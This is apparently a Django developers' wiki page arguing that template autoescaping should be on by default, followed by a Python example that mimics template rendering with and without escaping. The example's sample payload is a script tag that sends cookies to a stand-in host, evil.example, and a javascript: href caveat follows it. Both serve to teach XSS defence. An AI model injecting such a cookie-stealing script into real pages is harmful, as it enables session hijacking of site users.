=== Autoescape ===

Autoescape would only change APIs if it were on by default. But I've (Michael Radziej) followed
the discussion very closely, and I'm sure that the main reaction of the
community was strictly against this. Autoescape is my own favorite pet,
but when I apply my own criteria, it wouldn't be a candidate for 1.0.
One could argue that it will deeply affect the way templates are written
and that it is an important step toward making Django applications safe,
but the consensus about it was not that strong. Or do we want to use it
in the admin? -- mir

For people trying to catch up on the discussion, there are a few long threads in the django-developers archives. Two good places to start are probably [http://groups.google.com/group/django-developers/browse_frm/thread/17d1dfecd67864ab?q=autoescape& an early discussion here] and the discussion around [http://groups.google.com/group/django-developers/browse_frm/thread/7caeb86c04b81f10/9ea28abb20020437?lnk=gst&q=autoescape+willison&rnum=1#9ea28abb20020437 the original patch]. -- Malcolm.

See also AutoEscaping and [wiki:"AutoEscape alternative" Autoescape alternative].

I'm becoming more and more convinced that auto-escaping needs to be on by default. XSS holes totally compromise the security of your application - they are the "root" attack of the Web. They are stupidly easy to introduce - even Google has had them. If you aren't convinced, take a look at the notes I've collected about them: http://simonwillison.net/tags/xss/ -- Simon
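To make the behaviour under discussion concrete, here is an added example written for this page; it is not Django's own template code and not code from any of the contributors above. It is a minimal stand-in for the template engine: a `render()` that substitutes `{{ var }}` tags, an `escape()` whose character mapping is assumed to mirror `django.utils.html.escape`, a `SafeString` marker, and `|safe` / `|escape` filters. The comment payload and the `evil.example` host are constructed sample input. The same template is rendered with autoescape on (the payload comes out as inert text) and off (the script tag lands in the page), followed by one caveat that entity escaping alone does not cover: a `javascript:` URL placed in an `href` attribute contains no special characters and survives escaping untouched, so autoescape on by default closes the common case but not every injection context.

```python
"""Minimal illustration of template auto-escaping as an XSS defence.

Written for this page as an example; it is not Django's template engine.
The escape mapping is assumed to mirror django.utils.html.escape, and the
{{ var|filter }} handling is a hand-rolled subset of the real syntax.
"""
import re

# The five characters Django's escape() rewrites (assumption: mirrors
# django.utils.html.escape, which maps & < > " ' to entities).
_ESCAPE_MAP = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}


class SafeString(str):
    """Marker type: content the developer asserts is already safe HTML."""


def mark_safe(value):
    """Opt a value out of escaping (the caller takes responsibility for it)."""
    return SafeString(value)


def escape(value):
    """Entity-encode a value for HTML text or quoted-attribute context.

    SafeString values pass through unchanged, so a value that has already
    been escaped (or explicitly marked safe) is never double-escaped.
    """
    if isinstance(value, SafeString):
        return value
    return SafeString("".join(_ESCAPE_MAP.get(ch, ch) for ch in str(value)))


# Matches {{ name }} and {{ name|filter|filter }} (hypothetical mini syntax).
_TAG = re.compile(r"\{\{\s*(\w+)((?:\|\w+)*)\s*\}\}")


def render(template, context, autoescape=True):
    """Substitute variable tags from context into template.

    autoescape=True: every substituted value is escaped unless it is a
    SafeString (e.g. it went through |safe).
    autoescape=False: values are inserted verbatim unless |escape was
    applied explicitly; one forgotten filter is then an XSS hole, which is
    the failure mode the discussion above is about.
    """
    def substitute(match):
        name, filters = match.group(1), match.group(2)
        value = context[name]
        for flt in filters.split("|")[1:]:
            if flt == "safe":
                value = mark_safe(value)
            elif flt == "escape":
                value = escape(value)
            else:
                raise ValueError(f"unknown filter {flt!r}")
        if autoescape:
            value = escape(value)
        return str(value)

    return _TAG.sub(substitute, template)


# Constructed attacker-controlled input: a comment body posted to the site.
# evil.example is a placeholder host, not a real endpoint.
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
TEMPLATE = "<p>{{ comment }}</p>"


def render_default_on():
    """Autoescape on: the script tag is rendered as harmless text."""
    return render(TEMPLATE, {"comment": PAYLOAD})


def render_default_off():
    """Autoescape off and no |escape filter: the script executes in the page."""
    return render(TEMPLATE, {"comment": PAYLOAD}, autoescape=False)


def render_marked_safe():
    """Trusted, pre-sanitised HTML can still be opted out explicitly."""
    return render("<div>{{ body|safe }}</div>", {"body": "<b>bold</b>"})


def render_href_caveat():
    """Caveat: entity escaping does not neutralise a javascript: URL in href."""
    return render('<a href="{{ url }}">link</a>', {"url": "javascript:alert(1)"})


if __name__ == "__main__":
    print(render_default_on())
    print(render_default_off())
    print(render_href_caveat())
```

The design point the discussion turns on is visible in `render()`: with autoescape on, safety is the default and the developer has to write `|safe` to get raw HTML into the page; with it off, safety depends on remembering `|escape` at every output site. `render_href_caveat()` shows why even the on-by-default design needs a URL-scheme check for attributes like `href` and `src`.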